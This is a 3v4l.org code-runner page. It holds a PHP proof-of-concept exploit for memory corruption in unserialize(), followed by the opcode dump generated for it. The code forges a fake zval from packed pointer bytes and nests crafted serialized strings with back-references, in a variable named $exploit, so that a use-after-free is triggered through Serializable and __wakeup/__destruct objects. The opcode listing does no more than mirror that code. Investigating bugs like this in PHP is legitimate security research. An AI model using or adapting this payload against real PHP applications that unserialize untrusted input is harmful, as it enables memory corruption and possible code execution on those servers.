3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } class obj2 { var $ryat; function __wakeup() { $this->ryat = 1; } } class aod { public $aod; public function __destruct() { $this->aod=null;echo('des'); } } $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $inner = 'a:1:{i:0;R:3;'; $exploit = 'a:3:{i:0;O:4:"obj2":1:{s:4:"ryat";C:3:"obj":'.strlen($inner).':{'.$inner.'}}'; $exploit.= 'i:1;s:'.strlen($fakezval).':"'.$fakezval.'";'; $exploit.= 'i:2;a:1:{i:13;a:1:{i:15;r:4;}}}'; $i='O:3:"aod":2:{s:3:"aod";a:5:{i:0;R:5;i:1;R:3;'; $j='C:3:"obj":'.strlen($i).':{'.$i.'}'; $k='C:3:"obj":'.strlen($j).':{'.$j.'}'; $l='a:2:{i:0;'.$k.'i:1;R:5;}'; $data = unserialize($l); var_dump($data); function ptr2str($ptr) { $out = ''; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; }
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  (null)
number of ops:  51
compiled vars:  !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $i, !4 = $j, !5 = $k, !6 = $l, !7 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   DECLARE_CLASS                                            'obj'
   26     1        INIT_FCALL_BY_NAME                                       'ptr2str'
          2        SEND_VAL_EX                                              1122334455
          3        DO_FCALL                                      0  $8      
          4        ASSIGN                                                   !0, $8
   27     5        INIT_FCALL_BY_NAME                                       'ptr2str'
          6        SEND_VAL_EX                                              0
          7        DO_FCALL                                      0  $10     
          8        ASSIGN_OP                                     8          !0, $10
   28     9        ASSIGN_OP                                     8          !0, '%00%00%00%00'
   29    10        ASSIGN_OP                                     8          !0, '%01'
   30    11        ASSIGN_OP                                     8          !0, '%00'
   31    12        ASSIGN_OP                                     8          !0, '%00%00'
   33    13        ASSIGN                                                   !1, 'a%3A1%3A%7Bi%3A0%3BR%3A3%3B'
   34    14        STRLEN                                           ~17     !1
         15        CONCAT                                           ~18     'a%3A3%3A%7Bi%3A0%3BO%3A4%3A%22obj2%22%3A1%3A%7Bs%3A4%3A%22ryat%22%3BC%3A3%3A%22obj%22%3A', ~17
         16        CONCAT                                           ~19     ~18, '%3A%7B'
         17        CONCAT                                           ~20     ~19, !1
         18        CONCAT                                           ~21     ~20, '%7D%7D'
         19        ASSIGN                                                   !2, ~21
   35    20        STRLEN                                           ~23     !0
         21        CONCAT                                           ~24     'i%3A1%3Bs%3A', ~23
         22        CONCAT                                           ~25     ~24, '%3A%22'
         23        CONCAT                                           ~26     ~25, !0
         24        CONCAT                                           ~27     ~26, '%22%3B'
         25        ASSIGN_OP                                     8          !2, ~27
   36    26        ASSIGN_OP                                     8          !2, 'i%3A2%3Ba%3A1%3A%7Bi%3A13%3Ba%3A1%3A%7Bi%3A15%3Br%3A4%3B%7D%7D%7D'
   38    27        ASSIGN                                                   !3, 'O%3A3%3A%22aod%22%3A2%3A%7Bs%3A3%3A%22aod%22%3Ba%3A5%3A%7Bi%3A0%3BR%3A5%3Bi%3A1%3BR%3A3%3B'
   39    28        STRLEN                                           ~31     !3
         29        CONCAT                                           ~32     'C%3A3%3A%22obj%22%3A', ~31
         30        CONCAT                                           ~33     ~32, '%3A%7B'
         31        CONCAT                                           ~34     ~33, !3
         32        CONCAT                                           ~35     ~34, '%7D'
         33        ASSIGN                                                   !4, ~35
   40    34        STRLEN                                           ~37     !4
         35        CONCAT                                           ~38     'C%3A3%3A%22obj%22%3A', ~37
         36        CONCAT                                           ~39     ~38, '%3A%7B'
         37        CONCAT                                           ~40     ~39, !4
         38        CONCAT                                           ~41     ~40, '%7D'
         39        ASSIGN                                                   !5, ~41
   41    40        CONCAT                                           ~43     'a%3A2%3A%7Bi%3A0%3B', !5
         41        CONCAT                                           ~44     ~43, 'i%3A1%3BR%3A5%3B%7D'
         42        ASSIGN                                                   !6, ~44
   42    43        INIT_FCALL                                               'unserialize'
         44        SEND_VAR                                                 !6
         45        DO_ICALL                                         $46     
         46        ASSIGN                                                   !7, $46
   45    47        INIT_FCALL                                               'var_dump'
         48        SEND_VAR                                                 !7
         49        DO_ICALL                                                 
   55    50      > RETURN                                                   1

Function ptr2str:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 11
Branch analysis from position: 11
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 4
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
Branch analysis from position: 4
filename:       /in/AeavT
function name:  ptr2str
number of ops:  15
compiled vars:  !0 = $ptr, !1 = $out, !2 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   47     0  E >   RECV                                             !0      
   49     1        ASSIGN                                                   !1, ''
   50     2        ASSIGN                                                   !2, 0
          3      > JMP                                                      ->11
   51     4    >   INIT_FCALL                                               'chr'
          5        BW_AND                                           ~5      !0, 255
          6        SEND_VAL                                                 ~5
          7        DO_ICALL                                         $6      
          8        ASSIGN_OP                                     8          !1, $6
   52     9        ASSIGN_OP                                     7          !0, 8
   50    10        PRE_INC                                                  !2
         11    >   IS_SMALLER                                               !2, 8
         12      > JMPNZ                                                    ~10, ->4
   54    13    > > RETURN                                                   !1
   55    14*     > RETURN                                                   null

End of function ptr2str

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    7     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  unserialize
number of ops:  7
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   RECV                                             !0      
    9     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   10     6      > RETURN                                                   null

End of function unserialize

End of class obj.

Class obj2:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  __wakeup
number of ops:  3
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   16     0  E >   ASSIGN_OBJ                                               'ryat'
          1        OP_DATA                                                  1
   17     2      > RETURN                                                   null

End of function __wakeup

End of class obj2.

Class aod:
Function __destruct:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AeavT
function name:  __destruct
number of ops:  4
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   ASSIGN_OBJ                                               'aod'
          1        OP_DATA                                                  null
          2        ECHO                                                     'des'
   23     3      > RETURN                                                   null

End of function __destruct

End of class aod.

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
150.86 ms | 1017 KiB | 17 Q